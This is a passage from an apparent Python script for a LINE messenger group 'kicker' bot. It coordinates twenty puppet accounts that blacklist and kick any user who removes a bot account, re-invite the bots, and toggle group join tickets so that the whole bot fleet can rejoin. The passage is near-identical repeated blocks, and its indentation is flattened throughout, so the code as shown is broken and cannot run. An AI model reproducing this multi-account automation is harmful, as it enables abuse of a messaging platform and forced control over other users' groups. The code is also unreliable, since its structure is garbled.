kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker16.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker16.updateGroup(G)
Ticket = kicker16.reissueGroupTicket(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
pass
return
if ga3 in op.param3:
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
    pass
else:
wait["blacklist"][op.param2] = True
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
G = kicker17.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.updateGroup(G)
Ticket = kicker17.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker17.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker17.updateGroup(G)
Ticket = kicker17.reissueGroupTicket(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
pass
return
if ga4 in op.param3:
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
    pass
else:
wait["blacklist"][op.param2] = True
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
G = kicker18.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.updateGroup(G)
Ticket = kicker18.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker18.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker18.updateGroup(G)
Ticket = kicker18.reissueGroupTicket(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
pass
return
if ga5 in op.param3:
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
    pass
else:
wait["blacklist"][op.param2] = True
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
G = kicker19.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.updateGroup(G)
Ticket = kicker19.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker19.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker19.updateGroup(G)
Ticket = kicker19.reissueGroupTicket(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
pass
return
if ga6 in op.param3:
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
    pass
else:
wait["blacklist"][op.param2] = True
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
G = kicker20.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.updateGroup(G)
Ticket = kicker20.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker20.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker20.updateGroup(G)
Ticket = kicker20.reissueGroupTicket(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
pass
return
if ga7 in op.param3:
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
    pass
else:
wait["blacklist"][op.param2] = True
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
G = kicker.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
pass
return
if ga8 in op.param3:
if op.param2 in Bots or op.param2 in owner or op.param2 in admin or op.param2 in staff:
    pass
else:
wait["blacklist"][op.param2] = True
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
G = kicker2.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.updateGroup(G)
Ticket = kicker2.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker2.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker2.updateGroup(G)
Ticket = kicker2.reissueGroupTicket(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker18.acceptGroupInvitation(op.param1)
except:
try:
